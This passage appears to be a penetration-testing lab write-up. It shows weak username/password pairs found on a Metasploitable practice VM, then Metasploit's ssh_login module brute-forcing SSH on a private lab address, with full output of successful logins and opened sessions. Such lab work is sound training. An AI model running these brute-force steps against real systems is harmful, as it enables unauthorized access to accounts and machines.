Connexion with weak password

We get some weak password/user on the FTP machine :

USERNAME PASSWORD
klog 123456789
sys batman
user user
postgres postgres
msfadmin msfadmin
service service

Let’s try to connect with these password

msf6> use scanner/ssh/ssh_login
msf6> set USER_FILE /home/kali/Documents/weak_users.txt
msf6> set PASS_FILE /home/kali/Documents/weak_passwords.txt
msf6> run 

[*] 192.168.56.2:22 - Starting bruteforce
[+] 192.168.56.2:22 - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
[*] SSH session 3 opened (192.168.56.3:41049 -> 192.168.56.2:22) at 2023-01-04 09:37:53 -0500
[-] 192.168.56.2:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[-] 192.168.56.2:22 - Failed: 'sys:123456789'
[+] 192.168.56.2:22 - Success: 'sys:batman' 'uid=3(sys) gid=3(sys) groups=3(sys) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 4 opened (192.168.56.3:37053 -> 192.168.56.2:22) at 2023-01-04 09:38:06 -0500
[-] 192.168.56.2:22 - Failed: 'user:123456789'
[-] 192.168.56.2:22 - Failed: 'user:batman'
[+] 192.168.56.2:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 5 opened (192.168.56.3:44431 -> 192.168.56.2:22) at 2023-01-04 09:38:20 -0500
[-] 192.168.56.2:22 - Failed: 'postgres:123456789'
[-] 192.168.56.2:22 - Failed: 'postgres:batman'
[-] 192.168.56.2:22 - Failed: 'postgres:user'
[+] 192.168.56.2:22 - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 6 opened (192.168.56.3:41915 -> 192.168.56.2:22) at 2023-01-04 09:38:40 -0500
[-] 192.168.56.2:22 - Failed: 'msfadmin:123456789'
[-] 192.168.56.2:22 - Failed: 'msfadmin:batman'
[-] 192.168.56.2:22 - Failed: 'msfadmin:user'
[-] 192.168.56.2:22 - Failed: 'msfadmin:postgres'
[+] 192.168.56.2:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 7 opened (192.168.56.3:45133 -> 192.168.56.2:22) at 2023-01-04 09:38:54 -0500
[-] 192.168.56.2:22 - Failed: 'service:123456789'
[-] 192.168.56.2:22 - Failed: 'service:batman'
[-] 192.168.56.2:22 - Failed: 'service:user'
[-] 192.168.56.2:22 - Failed: 'service:postgres'
[-] 192.168.56.2:22 - Failed: 'service:msfadmin'
[+] 192.168.56.2:22 - Success: 'service:service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 8 opened (192.168.56.3:45683 -> 192.168.56.2:22) at 2023-01-04 09:39:10 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed